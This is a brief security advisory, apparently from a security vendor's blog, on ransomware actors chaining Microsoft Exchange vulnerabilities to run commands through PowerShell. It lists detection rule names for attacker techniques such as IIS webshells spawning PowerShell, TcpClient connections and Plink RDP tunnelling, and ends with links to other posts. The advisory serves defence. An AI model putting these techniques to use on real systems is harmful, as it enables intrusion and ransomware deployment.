22 Dec / 2022
Microsoft Exchange Server (On-Premises) 2013, 2016, 2019 devices that have not applied update KB5019758 released on November 8.
There has been an increase of attacks against On-Prem Exchange Servers that are utilising Microsofts URL Rewrite mitigiations as a defence against CVE-2022-41080 and CVE-2022-41082.
Threat actors are chaining vulnerabilities CVE-2022-41080 and CVE-2022-41082 to infiltrate networks and deploy ransomware.
Attackers are using SSRF vulnerability CVE-2022-41040 to target the backend PowerShell service through Outlook Web Access.
Once the PowerShell service has been reached, vulnerability CVE-2022-41082 is exploited to execute arbitrary commands on the device.
System Administrators are advised to:
Attacker Technique - PowerShell Registry Cradle
Suspicious Process - PowerShell System.Net.Sockets.TcpClient
Suspicious Process - Exchange Server Spawns Process
PowerShell - Obfuscated Script
Webshell - IIS Spawns PowerShell
Attacker Technique - Plink Redirecting RDP
Attacker Technique - Renamed Plink
Suspicious Process - Started From Users Music Directory
Cythera Vulnerability Management Clients are actively being scanned for any vulnerable instances of Microsoft Exchange.
PaperCut Vulnerability - CVE-2023-27350, CVE-2023-27351
PaperCut MF & PaperCut NG VulnerabilitiesCVE: CVE-2023-27350, CVE-2023-27351 WHAT IS VULNERABLE? PaperCut MF or NG version 8.0 or later, on a…Read More
Ransomware attacks are on the rise in Australia. Here’s how to prepare for them.
It's a rare occasion these days that you open up the Australian business news and DON’T see anything about a cybersecurity attack. Whisper the…Read More
Partnerships should help build capability
Individuals and companies like to use the term ‘partnership’ when trying to build rapport and relationships. This creates a sense of cooper…Read More